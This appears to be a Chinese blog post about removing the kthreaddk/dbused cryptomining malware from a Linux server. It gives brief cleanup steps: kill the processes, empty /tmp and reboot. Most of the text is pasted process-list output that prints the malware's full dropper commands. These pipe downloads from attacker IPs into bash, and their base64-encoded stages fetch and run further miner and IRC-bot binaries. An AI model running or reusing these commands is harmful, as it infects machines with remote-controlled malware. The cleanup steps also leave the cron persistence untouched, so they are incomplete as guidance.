首页 > 其他分享 >处理挖矿病毒kthreaddk的过程

处理挖矿病毒kthreaddk的过程

时间:2023-11-29 11:25:18浏览次数:33  
标签:tmp 00 http 挖矿 kthreaddk 94.146 xms bash 病毒

问题描述

发现服务器的CPU和内存占用非常高,然后看了一下发现有几个异常的程序


  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                               
12043 root      20   0 2443988   2.3g      4 S 100.3 15.1   9:12.96 dbused                                                                                                
13556 root      20   0 2441068   2.3g   1408 S  99.7 15.1   5:05.31 kthreaddk  

然后再次执行

ps -ef

[root@serve1 ~]# ps -ef |grep http://
root      6262  6261  0 Jan06 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root      6476 11610  0 Jan23 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root      8570  8569  0 Jan06 ?        00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root     14491 14121  0 09:22 pts/0    00:00:00 grep --color=auto http://
root     15581 11610  0 Jan22 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root     16484 16467  0 Jan02 ?        00:00:00 bash /tmp/.dat http://194.38.23.170/bashirc.x86_64
root     19015 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root     19230 19017  0 Jan26 ?        00:00:00 curl -k http://dw.bpdeliver.ru/x86_64 -o /tmp/dbused
root     22662 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root     22735 11610  0 Jan26 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root     24207 11610  0  2022 ?        00:00:00 /bin/bash -c (curl -s http://194.38.23.170/xms || wget -q -O - http://194.38.23.170/xms || lwp-download http://194.38.23.170/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMzguMjMuMTcwL2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xOTQuMzguMjMuMTcwL2Jhc2hpcmMuJCh1bmFtZSAtbSkgPiAvdG1wL2lyY2Q7IGNobW9kICt4IC90bXAvaXJjZDsgL3RtcC9pcmNkOyBiYXNoIC90bXAvLmRhdCBodHRwOi8vMTk0LjM4LjIzLjE3MC8kKHVuYW1lIC1tKSA+IC90bXAvZGJ1c2VkOyBjaG1vZCAreCAvdG1wL2RidXNlZDsgL3RtcC9kYnVzZWQgLWMgJHVybDsgL3RtcC9kYnVzZWQgLXB3bg== | base64 -d | bash -
root     28928  2920  0 Feb16 ?        00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -

发现服务器已经被搞得不成样子了。

解决方案

首先杀死进程

kill -9 12043 12203 12202 12047 12048 12049 
plill -f kthreaddk

删除临时文件

rm -rf /tmp/*
rm -rf /var/tmp/*

然后重启计算机

reboot

然后发现系统恢复正常了

标签:tmp,00,http,挖矿,kthreaddk,94.146,xms,bash,病毒
From: https://www.cnblogs.com/dowhere/p/17864171.html

相关文章

  • 企业计算机服务器中了mkp勒索病毒怎么办?Mkp勒索病毒解密数据恢复
